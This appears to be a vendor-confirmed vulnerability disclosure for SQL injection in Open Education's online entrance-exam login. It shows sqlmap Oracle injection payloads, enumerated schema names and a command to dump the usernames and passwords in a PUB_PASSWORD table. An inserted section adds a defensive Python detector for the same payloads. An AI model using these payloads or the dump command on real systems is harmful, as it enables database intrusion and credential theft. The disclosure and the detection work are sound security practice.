2016-02-17: Details sent to the vendor, awaiting vendor handling
2016-02-17: Vendor has confirmed; details disclosed to the vendor only
2016-02-18: Vendor has fixed the vulnerability and disclosed it proactively; details disclosed to the public
.....
http://exam.open.com.cn/matriculationonline/login.asp 奥鹏教育 (Open Education) Distance Education Center -- entrance test online exam system, login request captured:
POST /matriculationonline/authenticate.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://exam.open.com.cn/matriculationonline/login.asp
Content-Type: text/xml; charset=gb2312
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: exam.open.com.cn
Content-Length: 131
Pragma: no-cache
Cookie: ASPSESSIONIDASQCRADQ=EIPCOLIBGJNLCMPMHKDDNPEN

<?xml version="1.0" encoding="gb2312"?><LoginInfo><UserSerial>111111</UserSerial><UserPassword>11111</UserPassword></LoginInfo>
The POST request is injectable....
Place: POST
Parameter: Imp_userstat
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: Imp_username=11111&Imp_password=11111&Imp_userstat=2 AND 1574=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(105)||CHR(120)||CHR(101)||CHR(58)||(SELECT (CASE WHEN (1574=1574) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(114)||CHR(108)||CHR(118)||CHR(58)||CHR(62))) FROM DUAL)&imageField.x=23&imageField.y=10

Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: Imp_username=11111&Imp_password=11111&Imp_userstat=2 AND 9663=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(84)||CHR(78)||CHR(68),5)&imageField.x=23&imageField.y=10
---
[04:15:40] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.4
back-end DBMS: Oracle
[04:15:40] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[04:15:40] [INFO] fetching database (schema) names
available databases [17]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HAIHONG
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] WSD
[*] XDB

Running sqlmap against the WSD schema.....
Database: WSD
[138 tables]
Dump it directly and take a look (sqlmap.py -r 1.txt -D WSD -T PUB_PASSWORD -C USERNAME,PASSWORD --dump --threads=10 --start=1 --stop=1000)
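As an added example (not part of the original report), a small Python detector for the two Oracle injection techniques sqlmap flagged at this endpoint, run over constructed request-log lines that cover both the XML login body and the urlencoded form parameters; the log layout, the client address, and the function names `extract_fields`, `flag_request` and `scan_log` are assumptions.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs
# Signatures of the two Oracle techniques sqlmap reported for this endpoint:
# error-based via XMLType(CHR(...)||...) and time-based via DBMS_PIPE.RECEIVE_MESSAGE(...).
ORACLE_INJECTION_SIGNATURES = {
    "oracle_error_based_xmltype": re.compile(r"\bXMLType\s*\(\s*CHR\s*\(", re.I),
    "oracle_time_based_dbms_pipe": re.compile(r"\bDBMS_PIPE\s*\.\s*RECEIVE_MESSAGE\s*\(", re.I),
    "boolean_subquery_from_dual": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\(\s*SELECT\b.*\bFROM\s+DUAL\b", re.I | re.S),
}

def extract_fields(content_type, body):
    """Return {field: value} for both body shapes seen at this endpoint:
    the <LoginInfo> XML document and the urlencoded form sqlmap injected into."""
    if "xml" in content_type.lower():
        return {child.tag: (child.text or "") for child in ET.fromstring(body)}
    # parse_qs percent-decodes values and turns '+' into spaces
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

def flag_request(content_type, body):
    """Return {field: [signature names]} for every field whose value matches."""
    hits = {}
    for field, value in extract_fields(content_type, body).items():
        matched = [n for n, rx in ORACLE_INJECTION_SIGNATURES.items() if rx.search(value)]
        if matched:
            hits[field] = matched
    return hits

def scan_log(lines):
    """Lines use an assumed tab-separated 'ts client path content-type body' layout."""
    findings = []
    for line in lines:
        ts, client, path, ctype, body = line.split("\t", 4)
        hits = flag_request(ctype, body)
        if hits:
            findings.append({"ts": ts, "client": client, "path": path, "fields": hits})
    return findings

# Constructed sample entries (not the report's own logs); 203.0.113.0/24 is documentation space.
SAMPLE_LOG = [
    "2016-02-17T04:15:39\t203.0.113.5\t/matriculationonline/authenticate.asp\ttext/xml\t"
    "<LoginInfo><UserSerial>111111</UserSerial><UserPassword>11111</UserPassword></LoginInfo>",
    "2016-02-17T04:15:40\t203.0.113.5\t/matriculationonline/authenticate.asp\tapplication/x-www-form-urlencoded\t"
    "Imp_username=11111&Imp_password=11111&Imp_userstat=2+AND+9663%3DDBMS_PIPE.RECEIVE_MESSAGE"
    "%28CHR%2877%29%7C%7CCHR%2884%29%2C5%29&imageField.x=23&imageField.y=10",
    "2016-02-17T04:15:41\t203.0.113.5\t/matriculationonline/authenticate.asp\ttext/xml\t"
    "<LoginInfo><UserSerial>1 AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58))) FROM DUAL)</UserSerial>"
    "<UserPassword>x</UserPassword></LoginInfo>",
]
```

The benign first entry produces no finding, while the two sqlmap-shaped entries are attributed to the exact field that carried the payload, which is what a WAF or log review needs to confirm the parameter named in the report.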
Severity: High
Vulnerability Rank: 18
Confirmed: 2016-02-17 10:28
Forwarded to the relevant personnel for handling. -liu
2016-02-18: The vulnerability has been fixed. Please help verify, thanks!